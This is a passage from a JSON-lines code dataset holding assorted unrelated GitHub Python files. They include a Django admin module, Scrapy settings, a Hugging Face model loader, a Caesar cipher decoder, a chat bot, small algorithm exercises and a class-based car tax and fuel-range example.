CustomBaseAdmin\nfrom .models import TrainingSpace, PhysicalSpace, VirtualSpace, TrainingSpaceResource\n\n\n# Inline Classes\n# -------------------------------------------------------\nclass TrainingSpaceResourceInlineAdmin(admin.StackedInline):\n model = TrainingSpaceResource\n extra = 0\n fields = ['type', 'extra_data']\n\n formfield_overrides = {pgfields.JSONField: {\"widget\": JSONEditor}}\n\n\n# Admin classes\n# -------------------------------------------------------\nclass PhysicalSpaceAdmin(CustomBaseAdmin):\n list_display = ['id', 'name', 'type', 'location']\n list_display_links = ['id', 'name']\n\n inlines = [TrainingSpaceResourceInlineAdmin]\n\n def formfield_for_choice_field(self, db_field, request, **kwargs):\n if db_field.name == \"type\":\n kwargs[\"choices\"] = (('', '---------'),) + TrainingSpace.Type.PHYSICAL_CHOICES\n return super().formfield_for_choice_field(db_field, request, **kwargs)\n\n\nclass VirtualSpaceAdmin(CustomBaseAdmin):\n list_display = ['id', 'name', 'type']\n list_display_links = ['id', 'name']\n\n def formfield_for_choice_field(self, db_field, request, **kwargs):\n if db_field.name == \"type\":\n kwargs[\"choices\"] = TrainingSpace.Type.VIRTUAL_CHOICES\n return super().formfield_for_choice_field(db_field, request, **kwargs)\n\n\nadmin.site.register(PhysicalSpace, PhysicalSpaceAdmin)\nadmin.site.register(VirtualSpace, VirtualSpaceAdmin)\n","repo_name":"hmachuca22/agglad","sub_path":"training/spaces/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24656428309","text":"# Scrapy settings for product project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\nSPIDER_MODULES = ['car.spiders']\nNEWSPIDER_MODULE = 'car.spiders'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False\n\nCONCURRENT_REQUESTS_PER_DOMAIN = 10\nCONCURRENT_REQUESTS = 10\n\n#USER_AGENT = 'scrapy-redis (+https://github.com/rolando/scrapy-redis)'\n\nREDIS_START_URLS_AS_SET = True\n\nDUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\"\nSCHEDULER = \"scrapy_redis.scheduler.Scheduler\"\nSCHEDULER_PERSIST = True\n#SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderPriorityQueue\"\n#SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderQueue\"\n#SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderStack\"\n\nITEM_PIPELINES = {\n 'scrapy_redis.pipelines.RedisPipeline': 300,\n}\n\nLOG_LEVEL = 'DEBUG'\n\n# Introduce an artifical delay to make use of parallelism. to speed up the crawl.\nDOWNLOAD_DELAY = 4\n\nDOWNLOAD_TIMEOUT = 8\n\n# DOWNLOADER_MIDDLEWARES = {\n# 'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware' : None,\n# 'product.rotate_useragent.RotateUserAgentMiddleware' :400,\n# 'scrapy.contrib.downloadermiddleware.retry.RetryMiddleware': None,\n# 'product.rotate_retry.RotateRetryMiddleware' :500\n# }\n\n# Retry many times since proxies often fail\nRETRY_TIMES = 3\n# Retry on most error codes since proxies fail for different reasons\nRETRY_HTTP_CODES = [500, 502, 503, 504, 400, 403, 404, 408, 520]\n\n# SPIDER_MIDDLEWARES = {\n# 'scrapy.contrib.spidermiddleware.referer.RefererMiddleware': True,\n# }\n\n# disable cookies\nCOOKIES_ENABLED = False\nCOOKIES_ENABLES = False\n\n# redis params\nIP_POOL_KEY = '%(name)s:ip_pool'\nREDIS_PARAMS = {\n 'socket_timeout': 30,\n 'socket_connect_timeout': 30,\n 'retry_on_timeout': True,\n 'encoding': 'utf-8',\n #'db': 1,\n # 'password': \"mypasshahayou\",\n # 'host': \"192.168.200.116\",\n 'port': \"6379\",\n}","repo_name":"t1m0thyZhang/autohome","sub_path":"car/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18791421218","text":"r\"\"\"\nFalcon REST server builder for Eka.\n\"\"\"\n\n# Meta\n__plugin_name__ = 'rest.server.falcon'\n__keywords__ = 'Falcon REST server'\n__author__ = 'Viswanath Chidambaram'\n__email__ = 'viswanc@thoughtworks.com'\n__version__ = '0.0.1'\n\n# Imports\nfrom eka.plugins import define, getPluginClass\nCrudApp = getPluginClass('crud.app')\n\n# Data\nbuilderClass = 'python.crud.app'\n\n# Plugin\n@define(__plugin_name__)\nclass Falcon(CrudApp):\n def __init__(self, Structure, Scopes):\n CrudApp.__init__(self, Structure, Scopes)\n\n def build(self):\n from os.path import dirname\n from eka.classes.builders.jinja import jinjaBuilder\n\n Structure = self.Structure\n buildTgt = Structure['buildBase']\n buildSrc = '%s/res' % dirname(__file__)\n builtPath = jinjaBuilder().build(buildSrc, buildTgt, Structure)\n\n # Build the CRUD App\n Structure['buildBase'] = '%s/src/crud' % builtPath\n getPluginClass(builderClass)(self.Structure, self.Scopes).build()\n Structure['buildBase'] = buildTgt\n\n return builtPath\n","repo_name":"viswanc/eka-builder-falcon","sub_path":"ekaPyRESTFalcon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212835045","text":"import sys\r\nfrom itertools import permutations\r\n\r\n\r\ndef main():\r\n N, M = map(int, input().split())\r\n seq = list(map(int, input().split()))\r\n seq.sort()\r\n checked: set[int] = set()\r\n for C in permutations(seq, M):\r\n if C not in checked:\r\n print(*C)\r\n checked.add(C)\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/15663. N과 M (9)/N과 M (9).py","file_name":"N과 M (9).py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39260333491","text":"from typing import List, Optional, Union\n\nimport torch\n\nfrom run_gpt.helper import _DEFAULT_FP16_DTYPE, get_device_map\nfrom run_gpt.logs import logger\n\n\ndef load_model_and_tokenizer(\n model_name_or_path: str,\n tokenizer_name_or_path: Optional[str] = None,\n device: Optional[str] = None,\n precision: Optional[str] = None,\n dtype: Optional[torch.dtype] = None,\n device_map: Optional[Union[str, List[int]]] = None,\n use_fast: bool = False,\n **kwargs,\n):\n \"\"\"Load a model and tokenizer from HuggingFace.\"\"\"\n from transformers import AutoModelForCausalLM, AutoTokenizer\n\n logger.info(\n f'Loading tokenizer from {tokenizer_name_or_path or model_name_or_path} ...'\n )\n tokenizer = AutoTokenizer.from_pretrained(\n tokenizer_name_or_path or model_name_or_path,\n trust_remote_code=True,\n # use_fast=use_fast,\n )\n\n if tokenizer.pad_token is None:\n # Issue: GPT models don't have a pad token\n tokenizer.pad_token = tokenizer.unk_token\n tokenizer.pad_token_id = tokenizer.unk_token_id\n\n # For generation padding tokens should be on the left\n tokenizer.padding_side = \"left\"\n\n logger.info(f\"Loading {model_name_or_path} with precision {precision} ...\")\n\n quantization_config = None\n if precision == 'bit8':\n from transformers import BitsAndBytesConfig\n\n quantization_config = BitsAndBytesConfig(\n load_in_8bit=True,\n llm_int8_enable_fp32_cpu_offload=True,\n llm_int8_skip_modules=[\"lm_head\"],\n )\n elif precision == 'bit4':\n from packaging import version\n\n from run_gpt import importlib_metadata\n\n trf_version = importlib_metadata.version(\"transformers\")\n if 'dev' in trf_version:\n trf_version = '.'.join(trf_version.split('.')[:-1])\n supports_kbit = version.parse(trf_version) >= version.parse(\"4.30.0\")\n assert supports_kbit, (\n f\"4-bit quantization requires transformers >= v4.30.0, you have transformers=={trf_version}.\\n\"\n f\"You can install the latest transformers with `pip install git+https://github.com/huggingface/transformers`.\"\n )\n\n from transformers import BitsAndBytesConfig\n\n quantization_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_compute_dtype=_DEFAULT_FP16_DTYPE,\n bnb_4bit_use_double_quant=True,\n bnb_4bit_quant_type='nf4',\n )\n\n model = AutoModelForCausalLM.from_pretrained(\n model_name_or_path,\n torch_dtype=dtype or torch.float16,\n quantization_config=quantization_config,\n device_map=device_map or get_device_map(device),\n # split large weight files into smaller ones and use the disk as temporary storage. This is useful for\n # loading large models on machines with low RAM.\n low_cpu_mem_usage=True,\n trust_remote_code=True,\n )\n\n return model, tokenizer\n","repo_name":"jina-ai/rungpt","sub_path":"run_gpt/models/loading.py","file_name":"loading.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"52"} +{"seq_id":"72581423526","text":"# Author: Jaap Kanbier\r\n# Student number: s1100592\r\n# Assignment: Caesar cipher - https://dodona.ugent.be/en/exercises/105361566/\r\n\r\n# first input is the amount or the ROT, so 4 means ROT4 encryption\r\n# the secondary input is the actual data that was encoded using this key\r\n# the output is the decrypted value based of the ROT key\r\n\r\nif __name__ == '__main__':\r\n # import both the upper and lowercase alphabetical characters\r\n from string import ascii_lowercase as lc, ascii_uppercase as uc\r\n\r\n # take user input and convert the ROT key to an integer\r\n rot_key = int(input(\"What is the ROT value: \"))\r\n rot_string = input(\"Which string do you want to decrypt? \")\r\n\r\n # turn the encryption around since we need to translate it back\r\n rot_key = abs(rot_key - 26)\r\n\r\n # build a translation using slicing based of the key\r\n rot_table = str.maketrans(lc + uc, lc[rot_key:] + lc[:rot_key] + uc[rot_key:] + uc[:rot_key])\r\n\r\n # display the translation of the string based of the table\r\n print(rot_string.translate(rot_table))","repo_name":"balancedpath/ISCRIP","sub_path":"week3/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4391006557","text":"#!/usr/bin/env python\n\nimport asyncio\nimport websockets\n\nasync def remote_start(ws):\n idtag_remote = await ws.recv()\n print(\"< {}\".format(idtag_remote))\n \nasync def main(): \n\n async with websockets.connect(\n 'ws://localhost:9000/CP_1', \n subprotocols=['ocpp1.6']\n ) as ws:\n\n await asyncio.gather(\n remote_start(ws)\n )\n\nif __name__ == '__main__':\n try:\n # asyncio.run() is used when running this example with Python 3.7 and\n # higher.\n asyncio.run(main())\n except AttributeError:\n # For Python 3.6 a bit more code is required to run the main() task on\n # an event loop.\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n loop.close()\n","repo_name":"diegogonzalezmaneyro/car-charge-handler","sub_path":"charge_point/testing/websocket_client.py","file_name":"websocket_client.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"70519476645","text":"from __future__ import annotations\nfrom copy import deepcopy\nimport re\nfrom impacts_model.impacts import (\n EnvironmentalImpact,\n ImpactCategory,\n ImpactSourceId,\n ImpactSourceImpact,\n ImpactValue,\n merge_env_impact,\n)\nfrom pint import Unit\nimport yaml\nfrom impacts_model.quantities.quantities import (\n deserialize_quantity,\n deserialize_unit,\n)\nfrom marshmallow import Schema, fields\n\n\nclass ImpactSource:\n \"\"\"\n A source of environmental impact\n \"\"\"\n\n def __init__(\n self,\n id: ImpactSourceId,\n name: str,\n unit: str | Unit,\n environmental_impact: EnvironmentalImpact,\n uses=[],\n source: str = \"\",\n methodology: str = \"\",\n ) -> None:\n\n self.id = id\n self.name = name\n self._own_impact = environmental_impact\n self.uses = uses if uses is not None else []\n self.unit = deserialize_unit(unit)\n\n self.source = source\n self.methodology = methodology\n\n # Set as impact per ImpactSource unit\n for impact in self._own_impact:\n self._own_impact[impact].divide_by(self.unit)\n\n def get_impact(self) -> ImpactSourceImpact:\n \"\"\"\n Return this impact source impact for one unit\n \"\"\"\n sub_impacts = self._get_sub_impacts()\n # total = self._get_total(sub_impacts)\n return ImpactSourceImpact(self.id, deepcopy(self._own_impact), sub_impacts)\n\n def _get_total(\n self, sub_impacts: dict[ImpactSourceId, ImpactSourceImpact]\n ) -> EnvironmentalImpact:\n \"\"\"\n Return this ImpactSource EnvironmentalImpact, as the sum of its sub impact sources and own impact\n \"\"\"\n # The result will always add this ImpactSource own impact\n total = deepcopy(self._own_impact)\n # Iterate though sub_impacts to sum them into the result\n for sub_impact in sub_impacts:\n total = merge_env_impact(total, sub_impacts[sub_impact].total_impact)\n return total\n\n def _get_sub_impacts(self) -> dict[ImpactSourceId, ImpactSourceImpact]:\n \"\"\"\n Return a list of ImpactSourceImpact, for all the sub_impacts of this ImpactSource\n \"\"\"\n result: dict[ImpactSourceId, ImpactSourceImpact] = {}\n\n # Iterate through impact source used\n for use in self.uses:\n # deserialize the impact source and amount\n impact_source = impact_source_factory(use[\"resource_id\"])\n amount = deserialize_quantity(use[\"quantity\"])\n\n if amount:\n impact = impact_source.get_impact()\n # Compute the other resource quantity consumed to remove its unit\n impact.multiply_by(amount)\n # Set as quantity per this ImpactSource unit\n impact.divide_by(self.unit)\n # Add to sub impacts list\n if impact_source.id in result:\n result[impact_source.id].add(impact)\n else:\n result[impact_source.id] = impact\n return result\n\n @property\n def has_time_input(self) -> bool:\n units_split = re.split(r\"[*,/]\", str(self.unit))\n units_split_len = len(units_split)\n if units_split_len < 2:\n return False\n else:\n return deserialize_quantity(1 * units_split[0]).check(\n \"[time]\"\n ) or deserialize_quantity(1 * units_split[1]).check(\"[time]\")\n\n\nclass ImpactSourceSchema(Schema):\n id = fields.Str()\n name = fields.Str()\n unit = fields.Str()\n source = fields.Str(\n allow_none=True,\n )\n methodology = fields.Str(\n allow_none=True,\n )\n\n\ndef _get_all_impact_sources() -> list[ImpactSource]:\n def impact_source_constructor(loader, node):\n fields = loader.construct_mapping(node, deep=True)\n return ImpactSource(**fields)\n\n def impact_value_constructor(loader, node) -> ImpactValue:\n fields = loader.construct_mapping(node, deep=True)\n return ImpactValue(**fields)\n\n def environmental_impact_constructor(loader, node) -> EnvironmentalImpact:\n \"\"\"\n Useful to translate readable yaml categories to ImpactCategory\n Ex: climate_change to kg_co2\n \"\"\"\n fields = loader.construct_mapping(node, deep=True)\n climate_change = fields[\"climate_change\"]\n resource_depletion = fields[\"resource_depletion\"]\n acidification = fields[\"acidification\"]\n fine_particles = fields[\"fine_particles\"]\n ionizing_radiations = fields[\"ionizing_radiations\"]\n water_depletion = fields[\"water_depletion\"]\n raw_materials = fields[\"raw_materials\"]\n return {\n ImpactCategory.CLIMATE_CHANGE: climate_change\n if climate_change is not None\n else ImpactValue(),\n ImpactCategory.RESOURCE_DEPLETION: resource_depletion\n if resource_depletion is not None\n else ImpactValue(),\n ImpactCategory.ACIDIFICATION: acidification\n if acidification is not None\n else ImpactValue(),\n ImpactCategory.FINE_PARTICLES: fine_particles\n if fine_particles is not None\n else ImpactValue(),\n ImpactCategory.IONIZING_RADIATIONS: ionizing_radiations\n if ionizing_radiations is not None\n else ImpactValue(),\n ImpactCategory.WATER_DEPLETION: water_depletion\n if water_depletion is not None\n else ImpactValue(),\n ImpactCategory.RAW_MATERIALS: raw_materials\n if raw_materials is not None\n else ImpactValue(),\n }\n\n yaml.add_constructor(\"!ImpactSource\", impact_source_constructor)\n yaml.add_constructor(\"!ImpactValue\", impact_value_constructor)\n yaml.add_constructor(\"!EnvironmentalImpact\", environmental_impact_constructor)\n\n list = []\n with open(\"impacts_model/data/impact_sources/default.yaml\", \"r\") as stream:\n data_loaded = yaml.load_all(stream, Loader=yaml.Loader)\n for data in data_loaded:\n list.append(data)\n return list\n\n\nimpact_sources = _get_all_impact_sources()\n\n\nclass ImpactSourceError(Exception):\n pass\n\n\ndef impact_source_factory(id: str) -> ImpactSource:\n \"\"\"\n Factory class to create an ImpactSource object from its id\n :param id: id of the ImpactSource to create\n :return: an ImpactSource object\n \"\"\"\n res = next((x for x in impact_sources if x.id == id), None)\n if res is None:\n raise ImpactSourceError(\"No corresponding impact source: \" + id)\n return res\n","repo_name":"Orange-OpenSource/SoftwareLifecycleEnvImpact","sub_path":"back/impacts_model/impact_sources.py","file_name":"impact_sources.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"6627251977","text":"# 异常捕获,\ntry:\n #int('abc')\n #sum = 1 + '1'\n #f = open('aaa.txt')\n #print(f.read())\n #f.close()\n num = 1\nexcept OSError as reason:\n print('文件出错了!出错的原因是:' + str(reason))\nexcept TypeError as reason:\n print('类型出错了!出错的原因是:' + str(reason))\n\n#except (OSError,TypeError): # 可以捕获这两种异常\n# print(\"出错啦\")\n\nexcept:\n print(\"出错了\")\n\n\n\ntry:\n f = open('bbb.txt', 'w')\n print(f.write(\"我存在了\"))\n sum = 1 + '1'\nexcept (OSError,TypeError):\n print('出错了')\nfinally:\n f.close()\n\n\n# 自己搞一个异常\nraise ZeroDivisionError('除数为0的异常')\n\n\n","repo_name":"Tlwhisper/yympyLevel0110","sub_path":"01_xiao_jia_yu/034_try.py","file_name":"034_try.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37621136258","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n #判断回文主要是前半部分和后半部分的比较,若能将前半部分压栈,再依次出栈与后半部分比较,则可判断是否回文。\n fast = slow = ListNode(0)\n fast = slow = head\n stack = []\n\n while fast and fast.next:\n stack.append(slow.val)\n slow = slow.next\n fast = fast.next.next\n\n if fast:\n slow = slow.next\n\n while slow:\n top = stack.pop()\n\n if top != slow.val:\n return False\n slow = slow.next\n return True\n\nclass Solution2:\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n if not head or not head.next:\n return True\n slow = fast = head\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n\n slow = slow.next\n slow = self.reverseList(slow)\n\n while slow:\n if head.val != slow.val:\n return False\n slow = slow.next\n head = head.next\n return True\n\n def reverseList(self, head):\n new_head = None\n while head:\n p = head\n head = head.next\n p.next = new_head\n new_head = p\n return new_head\n\n\nif __name__ == '__main__':\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(2)\n head.next.next.next = ListNode(1)\n print(Solution().isPalindrome(head))\n\n\n\n\n\n\n \"\"\"\n Time Complexity = O(N)\n Space Complexity = O(n/2)\n\n Given a singly linked list, determine if it is a palindrome.\n\n Example:\n Input: 1->2->2->1\n Output: true\n \"\"\"\n","repo_name":"yz5308/Python_Leetcode","sub_path":"Algorithm-Easy/234_Palindrome_Linked_List.py","file_name":"234_Palindrome_Linked_List.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5196398118","text":"import time\nfrom config import *\nfrom kamcordutils import *\nfrom messages import MessageManager\n\nUSERNAME_INDEX = 0\nMESSAGE_INDEX = 1\n\ndef compareMessages( firstMessage, secondMessage ):\n return firstMessage[ USERNAME_INDEX ] == secondMessage[ USERNAME_INDEX ] and firstMessage[ MESSAGE_INDEX ] == secondMessage[ MESSAGE_INDEX ]\n\nclass DazBot( object ):\n def __init__( self, streamUrl ):\n \n #Create the driver\n self.driver = webdriver.Firefox()\n self.driver.get( streamUrl )\n \n #Give the driver a chance to connect\n time.sleep( 2 )\n \n self.authUsers = []\n self.commands = {}\n \n self.messageManager = MessageManager( getMessages( self.driver ) )\n self.messageLog = []\n self.lastMessageScrape = [] \n \n def addAuthorizedUser( self, username ):\n if username not in self.authUsers:\n self.authUsers.append( username )\n \n def addCommand( self, command, message ):\n if command not in self.commands.keys():\n self.commands[ command ] = message\n \n def parseMessage( self, message ):\n if message.message in self.commands.keys() and message.username in self.authUsers:\n sendMessage( self.driver, self.commands[ message.message ] )\n \n def findMessageMatchPoint( self, scrapedMessages ):\n #Find find the index to current message match point, start by iterating backwards through the log\n for logIdx in range( len( self.messageLog ) - 1, -1, -1 ):\n \n #Compare against the messages in the last grab\n for msgIdx in range( 0, len( scrapedMessages ) ):\n \n #If the username and message are the same, we have a tentative match\n if( compareMessages( self.messageLog[ logIdx ], scrapedMessages[ msgIdx ] ) ):\n return msgIdx\n \n return 0\n \n def checkForMessages( self ):\n newMessages = self.messageManager.processMessages( getMessages( self.driver ) )\n \n for msg in newMessages:\n self.parseMessage( msg )\n\nif __name__ == \"__main__\":\n \n #Create the bot\n dazBot = DazBot( \"https://www.kamcord.com/live/evolution590/chat\" )\n\n #Add all of the users and commands\n dazBot.addAuthorizedUser( \"evolution590\" )\n dazBot.addAuthorizedUser( \"DazBoot\" )\n dazBot.addAuthorizedUser( \"Gravithon\" )\n \n dazBot.addCommand( \"!test\", \"This is a test command!\" )\n dazBot.addCommand( \"!commands\", \"GET OUT OF HERE!\" )\n\n \n #Connect and login\n time.sleep( 1 ) #Wait 1 second for the page to load before we continue\n sendMessage( dazBot.driver, \"Test message from DazBot\" )\n time.sleep( 1 ) #Wait 1 second for the login prompt before we continue\n login( dazBot.driver, USERNAME, PASSWORD )\n time.sleep( 1 ) #Wait 1 second for login to complete before we continue\n\n \n while( True ):\n dazBot.checkForMessages()\n time.sleep( 0.5 )","repo_name":"MeJosh/KamcordChatBot","sub_path":"python/src/dazbot.py","file_name":"dazbot.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1326671537","text":"# import required libraries\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n# download selected website\r\nr = requests.get(\"https://www.sjsu.edu/\")\r\n\r\n# get the html code of the selected site\r\nsoup = BeautifulSoup(r.text, \"html.parser\")\r\n\r\n# generate a list of elements on the site with the class \"o-calender__date\"\r\ndates = soup.select(\".o-calendar__date\")\r\n\r\n# create a task that runs for every item in dates\r\nfor d in dates:\r\n\t# print the text contained within the \"o-calender__date\" into the terminal window\r\n\tprint(d.text)","repo_name":"Chelsea-Thompto-Teaching-Examples/web_scraping_demo_f2020","sub_path":"scrap_ex1.py","file_name":"scrap_ex1.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71683310884","text":"import os.path\n\nfilePathAlles = '/Users/aaikoosters/Documents/Develop/TensorFlow_python/CodeProjects/lifecycleSet/train_FD001.txt'\n\nbasePath = os.getcwd() + '/'\nfilename = 'lifecycleSet/train_FD001.txt'\nfilenameUni1 = 'lifecycleSet/uni1_train.txt'\nfileSavePath = basePath + 'units/'\nprint(fileSavePath)\n\n\ndef writeToFile(listOfUnits, unitNumber):\n txtFile = open(fileSavePath + 'train_unit{}.txt'.format(unitNumber), 'w')\n print(txtFile)\n for x in listOfUnits:\n txtFile.write(x)\n txtFile.close()\n \nunitLines = []\nwith open(basePath+filename) as fp:\n line = fp.readline()\n unitNumber = 1\n while line:\n words = line.split()\n if int(words[0]) != unitNumber:\n writeToFile(unitLines, unitNumber)\n unitNumber += 1\n unitLines = []\n # end if\n lines = line.strip()\n # print(\"A {}: {}\".format(words[0], lines))\n line = fp.readline()\n unitLines.append(lines)","repo_name":"ndegier/ML4All","sub_path":"MLNET.Python/splitUnits.py","file_name":"splitUnits.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71056115365","text":"def is_right(a, b, c):\r\n '''Returns whether or not the three random integer numbers represent the three sides of a right-angled triangle\r\n Parameters:\r\n a, b, c - The three random integer numbers that represent three sides of a triangle\r\n Returns:\r\n True - if the three numbers represent the sides of a right-angled triangle\r\n False - if the three numbers do not represent the sides of a right-angled triangle \r\n '''\r\n if type(a) != int or type(b) != int or type(c) != int: #the values must be integers\r\n print(\"The numbers must be integers. Please type in integers\")\r\n return None\r\n elif a < 0 or b < 0 or c < 0: #the values must not be negative integers\r\n print(\"The numbers must be positive integer numbers. Please type in positive numbers\")\r\n return None \r\n else: # since the numbers can be given in any order we would have to consider which is the hypotenuse of the function.\r\n # So we consider for each values of a, b, c which it could be now that they are integers\r\n if a > b and a > c: # a is the largest of the three set of values and the hypotenuse\r\n if a**2 == b**2 + c**2:\r\n return True\r\n else:\r\n return False \r\n elif b > a and b > c: # b is the largest of the three set of values and the hypotenuse\r\n if b**2 == a**2 + c**2:\r\n return True\r\n else:\r\n return False\r\n else: # c is the largest of the three set of values and the hypotenuse\r\n if c**2 == a**2 + b**2:\r\n return True\r\n else:\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n print(is_right(10, 8, 6))\r\n print(is_right(8, 17, 15))\r\n print(is_right(5, 12, 13))\r\n print(is_right(10, 11, 12))\r\n print(is_right(10.0, 8.3, 6))\r\n print(is_right(\"10\", \"8\", \"6\"))\r\n print(is_right(-10, -8, -6))\r\n\r\n \r\n\r\n\r\n\r\n ","repo_name":"Akande-o/CTU-FEE","sub_path":"PRG/GRADED HOMEWORKS/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12821923946","text":"\n\n'''\nBuild two classes of your choice that can model a real-life example.\nThe class needs to meet the following requirements:\n\n at least 5 attributes each\n\n at least 2 methods each\n\n one class to inherit from another\n\nAs a demonstration create at least 5 instances of\none class (preferably the child class) and\ncall all the methods it holds\n\nEx: You can have one class (Country) that has general attributes\nabout countries such as area, neighbours, cities etc and\nmethods related to those attributes. The second class can be a\nspecific country (Romania) that has more specific attributes\nsuch as attractions, universities etc.\n'''\n\n# main class (parent class)\nclass Car(object):\n category = 'automobil'\n\n def __init__(self, brand, series, version, year, cubic_cap, power):\n self.brand = brand\n self.series = series\n self.var = version\n self.year = year\n self.cub_c = int(cubic_cap)\n self.power = int(power)\n\n # method that converts the power from [kW] in [hp] and compare it wit a specific value\n def print_message_medium_high_power(self):\n if int(self.power * 1.36) >= 200:\n print(\n f'\\nAutomobilul {self.brand} {self.var} din {self.year} dezvolta',\n f'{int(self.power * 1.36)} cai putere, automobil sportiv.'\n )\n else:\n print(\n f'\\nAutomobilul {self.brand} {self.var} din {self.year} dezvolta',\n f'{int(self.power * 1.36)} cai putere, are putere medie.'\n )\n\n # method that print a message\n @staticmethod\n def print_step():\n print('\\nTEST DE PUTERE')\n\n # method that calculate the taxes for a vahicle\n def tax(self):\n cubic_cil_test = (0, 1601, 2001, 2601, 3001)\n for x in range(len(cubic_cil_test) - 1):\n if self.cub_c in range(cubic_cil_test[x], cubic_cil_test[x + 1]):\n print(f'\\nPentru automobilul {self.brand} {self.var} a carui motor',\n f'are cilindreea de {self.cub_c} cmc, impozitul anual este',\n f'{tax_calc(self.cub_c, x):.2f} lei')\n if self.cub_c >= 3001:\n print(f'\\nPentru automobilul {self.brand} {self.var} a carui motor',\n f'are cilindreea de {self.cub_c} cmc, impozitul anual este',\n f'{tax_calc(self.cub_c, x + 1):.2f} lei')\n\n# child class of Automobil class an ads some new proprieties\nclass FuelCons(Car):\n\n def __init__(self, brand, series, version, year, cubic_cap, power, med_cons):\n self.cons = float(med_cons)\n super().__init__(brand, series, version, year, cubic_cap, power)\n\n # method calculates how many km cand you do with the fuel from the tank\n def range(self):\n quantity = float(input('\\nIntrodu cantitatea de combustibil din rezervor [l]: '))\n range_var = quantity / self.cons * 100\n print(f'\\nCu {quantity} litri de combustibil poti parcurge {range_var:.0f} km.')\n input('\\n\\33[31mPress Enter to continue...\\033[0m')\n\n def __repr__(self):\n class_name = type(self).__name__\n return '{} ({} {} {} - {} {} {}) [{}]'.format(\n class_name, self.brand,\n self.series, self.var, self.year, self.cub_c, self.power, id(self)\n )\n\n def __str__(self):\n return '{} {} {} - {} {} {}'.format(\n self.brand.ljust(10, ' '),\n self.series.ljust(10, ' '), self.var.ljust(8, ' '), self.year,\n str(self.cub_c).center(10), str(self.power).center(8))\n\nclass AutoFleet():\n\n def __init__(self, auto_list=None):\n self._autos = list(auto_list) if auto_list else []\n\n def __iter__(self):\n return iter(self._autos)\n \n\n# function calculate the auto txes\ndef tax_calc(cub_c, ind):\n return cub_c / 200 * tax_ind[ind]\n\n# function for inputing the vhicle datas\ndef auto_input():\n return FuelCons(\n input('Introdu marca automobilului:'),\n input('Introdu tipul automobilului: '),\n input('Introdu varianta automobilului: '),\n input('introdu anul de fabricatie: '),\n input('Introdu cilindreea motorului [cmc]: '),\n input('Introdu puterea motorului [kw]:'),\n input('Introdu consumul mediu de combustibil [l/100km]:')\n )\n\n# function process auto datas\ndef fleet_processing(list_in):\n for auto in list_in:\n auto.tax()\n auto.print_step()\n auto.print_message_medium_high_power()\n auto.range()\n\n\ntax_ind = (8, 19, 76, 153, 308)\n\n\n# creates the list with vehicles\ncars_list = [\n FuelCons('BMW', 'Seria 5', '530d', 2015, 2996, 210, 9.6),\n FuelCons('Audi', 'A6', '2.0Tdi', 2012, 1960, 140, 6.3),\n FuelCons('Mercedes', 'C-classe', 'C220cdi', 2014, 2156, 150, 7.4)\n]\n\nauto_fleet = AutoFleet(cars_list)\n\n\nprint('\\nse vor prelucra datele pentru urmatoaarea lista de automobile: \\n')\nprint('\\n MARCA TIP VARIANTA AN CILINDREE PUTERE')\n\n# print the list with vehicles\nfor auto in auto_fleet:\n print(auto)\n\ninput('\\n\\33[31mPress Enter to 